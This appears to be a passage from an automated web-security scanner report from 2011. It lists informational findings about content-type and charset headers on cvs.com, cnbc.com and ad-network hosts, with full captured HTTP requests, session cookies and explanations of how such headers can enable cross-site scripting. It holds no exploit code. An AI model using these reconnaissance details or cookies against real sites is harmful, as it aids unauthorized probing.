Path:   /CVSApp/user/forgot_password.jsp

Request

GET /CVSApp/user/forgot_password.jsp HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362882
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345673339:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:59 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2ZvcmdvdF9wYXNzd29yZC5qc3A.
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:48:00 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Length: 10074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml" class="ma
...[SNIP]...

27.41. https://www.cvs.com/CVSApp/user/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cvs.com
Path:   /CVSApp/user/login.jsp

Request

GET /CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832 HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:29 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2xvZ2luLmpzcA..
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:29 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Length: 47742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

28. Multiple content types specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.cnbc.com
Path:   /company/quote/index.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /company/quote/index.asp?symbol=.DJIA HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:25:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 2525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>CNBC Quote Modu
...[SNIP]...
</title>
   <meta http-equiv="Content-Type" content="" />
<link href="../resources/style/quotemodule.css" type="text/css" rel="stylesheet" media="all" />
...[SNIP]...

29. HTML does not specify charset
There are 84 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


29.1. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Request

GET /i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

29.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

29.3. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Request

GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 191
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246";
</script>

29.4. http://a.tribalfusion.com/z/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Request

GET /z/i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

29.5. http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3643.196990.READWRITEWEB.COM/B5659394

Request

GET /adi/N3643.196990.READWRITEWEB.COM/B5659394 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 345
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:05:44 GMT
Expires: Tue, 06 Sep 2011 17:05:44 GMT
Discarded: true
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/d;
...[SNIP]...

29.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.38

Request

GET /adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Date: Tue, 06 Sep 2011 15:10:51 GMT

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/4/67/%2a/d;243075555;0-0;0;70313744;4307-300/250;38606491/38624248/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://clk.specificclick.net/click
...[SNIP]...

29.7. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia/B5646003.2

Request

GET /adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=;ord=1315321144? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6342
Date: Tue, 06 Sep 2011 14:59:06 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Tue Apr 12 11:20:48 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

29.8. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 06 Sep 2011 17:05:43 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.9. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

29.10. http://api-cdn.cnbc.com/api/chart/chart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api-cdn.cnbc.com
Path:   /api/chart/chart.asp

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:57 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:56 GMT
Content-Length: 70
Connection: close

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

29.11. http://api.cnbc.com/api/chart/chart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/chart/chart.asp

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 70
Expires: Tue, 06 Sep 2011 16:25:59 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

29.12. http://api.cnbc.com/api/movers/movers.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:38 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:16:38 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...

29.13. http://apps.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:03:41 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Length: 218

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

29.14. http://apps.cnbc.com/Includes/CheckPng/Script.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.cnbc.com
Path:   /Includes/CheckPng/Script.asp

Request

GET /Includes/CheckPng/Script.asp HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://apps.cnbc.com/company/quote/index.asp?symbol=.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA; 1602%5F0=DD828BEE89FEC86F5AA0DE67CEF82168; 1602%5F1=YYY5%5FpRpBg6l89WksRDGqi31ugg%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 15:04:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Length: 409

function onPng(bLoad)
{
   var Png = document.checkPng;
   Png.onerror = null;
   Png.onload = null;
   if (bLoad && Png.width == 1 && Png.height == 1)
   {
       Png.src = "//apps.cnbc.com/Includes/CheckPng
...[SNIP]...

29.15. http://apps.cnbc.com/company/quote/incchart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.cnbc.com
Path:   /company/quote/incchart.asp

Request

GET /company/quote/incchart.asp?symbol=.DJIA HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:25:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1250


<html>
<head>
   <title>Quote Page -- Tabbed Chart</title>
   <link rel="stylesheet" href="../resources/style/incChart.css" type="text/css" />
</head>
<body>
   <div id="overviewChart">
       <di
...[SNIP]...

29.16. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:10 GMT
Server: Apache/2.0.52 (Red Hat)
